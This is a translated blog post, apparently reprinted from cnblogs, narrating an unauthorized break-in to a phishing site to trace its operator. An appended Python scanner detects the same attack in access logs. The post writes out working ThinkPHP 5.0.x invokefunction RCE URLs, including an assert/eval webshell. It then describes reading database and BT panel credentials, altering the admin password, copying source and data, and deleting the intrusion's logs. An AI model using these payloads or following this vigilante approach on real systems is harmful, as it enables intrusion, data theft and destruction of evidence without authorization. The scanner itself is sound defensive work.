Title: Record a penetration test of phishing scam websites

A senior of mine was unfortunately cheated out of some money on a phishing website a few days ago. Before contacting the relevant authorities, he came to me to see whether some useful information could be obtained to help their work.

After collecting preliminary information on the website, I found that it uses the ThinkPHP 5.0.7 framework, so I looked up the ThinkPHP exploit for that version and tried it directly:

http://www.hu*****.***/index.php?s=/index/\think\app/invokefunctionfunction=phpinfovars[0]=1 //Execute phpinfo

phpinfo popped up successfully, so the ThinkPHP RCE vulnerability had not been fixed. From phpinfo it could be seen that the server was built with the Baota (BT) panel and runs Windows. I thought the rest would be simple, but I ran into difficulties when writing the shell:

http://www.hu****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=file_put_contentsvars[1][]=ye.phpvars[1][]=?php

eval($_POST['cmd']);

The file was written successfully, but its content was output directly to the page. Checking the page source, I found it had been escaped as HTML entities.

After trying base64 encoding before writing, I found it was still escaped, so I tried executing a command directly instead:

http://www.hu****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=systemvars[1][]=dir

There was no output, and an attempt at a reverse shell also failed. At this point I suspected that system might have been disabled; I switched to eval and it still failed. Finally I found that assert could be executed successfully, so I constructed the shell connection directly:

http://www.hu*****.***/index.php?s=/index/\think\app/invokefunctionfunction=call_user_func_arrayvars[0]=assertvars[1][]=@eval($_POST[ye])

After getting the shell, I tried to execute commands first, but they still would not run normally. I tried to bypass disable_functions but failed.

At this point I changed approach and checked the ThinkPHP configuration file /application/database.php to obtain the MySQL database account.

Connected to the database.

Queried the backend administrator data.

But the md5 hash could not be cracked. I had a rough look through the data in the database and found nothing of much help there, so I did not keep working on the backend account.

The main focus next should be on collecting information about the site administrator. First, check the ThinkPHP log file /runtime/log/202107/05.log.

The log confirmed that the system function was indeed disabled.

At the same time, an important piece of data that had been overlooked when checking the database turned up in the log: the last login IP of the backend administrator.

Looking through the records from a few days earlier, I found that the last login IP was 101.78.*.*. I suspected this was the website administrator's IP address. After reporting it to the senior, I looked the IP up and found it was in Hong Kong. My heart sank: this was probably behind a VPN.

The result was as expected.

The work then stalled. After going through ThinkPHP's logs, no login records from other IPs were found. I changed the backend administrator account password in the database, but after logging in to the backend I found no useful information, only the management of some phishing articles.

Later I talked with an expert, who suggested checking whether any useful information had been left in the BT panel. I found the panel's data file at C:/BtSoft/panel/data/default.db and obtained the panel account information.

I also checked the log contents in the panel database.

However, the password could not be cracked. At this point one could reset the account password by overwriting the db file, but that method requires restarting the panel, which was hard to do in our situation.

So my thinking stalled again. After a night's sleep I woke up the next day and remembered that the BT panel keeps request logs, and I found a large amount of request information stored as JSON in C:/BtSoft/panel/logs/request/

Opening one of the earlier log files, there was indeed a breakthrough (the VPN may have been unstable and dropped during use, leaking the real IP).

After querying 175.167.*.*, it turned out to be an IP address in Shenyang, Liaoning. I used online tools to roughly locate it and reported back to the senior.

Along the way, the website's source code, database, and log files were packaged and collected, and finally I deleted the request records we had left behind during the intrusion.

Work finished.

Reprinted from the original link: https://www.cnblogs.com/yesec/p/14983903.html
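As an added, defender-side example (not part of the original post or the cnblogs article): a Python scanner that flags requests to the ThinkPHP 5.0.x invokefunction route quoted above in web-server access logs, reporting which PHP callable each request tried to invoke. The log lines are constructed, and the combined log format and the list of watched function names are my assumptions.

```python
"""Flag ThinkPHP 5.0.x invokefunction RCE attempts in web-server access logs."""
import re
from urllib.parse import parse_qs

# Combined-format access log line: client IP, timestamp, request target, status.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"\S+ (?P<target>\S+)[^"]*" (?P<status>\d{3})')

# PHP callables that have no business being named in a query string.
DANGEROUS_FUNCS = {"phpinfo", "system", "exec", "shell_exec", "passthru", "eval",
                   "assert", "call_user_func", "call_user_func_array", "file_put_contents"}

# Constructed sample log lines (not from the post); the attack-shaped requests follow
# the route quoted in the post, with the final payload argument redacted.
SAMPLE_LOG = """\
203.0.113.7 - - [05/Jul/2021:10:01:02 +0800] "GET /index.php?s=/index/article/list HTTP/1.1" 200 5123
203.0.113.9 - - [05/Jul/2021:10:02:11 +0800] "GET /index.php?s=/index/\\think\\app/invokefunction&function=phpinfo&vars[0]=1 HTTP/1.1" 200 84120
203.0.113.9 - - [05/Jul/2021:10:03:40 +0800] "GET /index.php?s=/index/%5Cthink%5Capp/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=REDACTED HTTP/1.1" 200 512
"""


def analyze_target(target):
    """Return a finding for a request target that hits the invokefunction route, else None."""
    if "?" not in target:
        return None
    # parse_qs percent-decodes values, so %5C and a literal backslash compare equal.
    params = parse_qs(target.split("?", 1)[1], keep_blank_values=True)
    route = params.get("s", [""])[0].lower()
    if "think\\app/invokefunction" not in route:
        return None
    # The callable arrives as function=...; with call_user_func_array it is vars[0]=...
    called = set(params.get("function", [])) | set(params.get("vars[0]", []))
    hits = sorted(f for f in called if f.lower() in DANGEROUS_FUNCS)
    return {"route": route, "functions": hits}


def scan(log_text):
    """Scan access-log text; return one finding per request hitting the vulnerable route."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and (finding := analyze_target(m["target"])):
            findings.append({"ip": m["ip"], "time": m["ts"], "status": int(m["status"]), **finding})
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} called {f['functions']} (HTTP {f['status']})")
```

A hit with HTTP 200 on this route is a strong sign the framework is unpatched, which is exactly what the phpinfo probe in the post confirmed.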
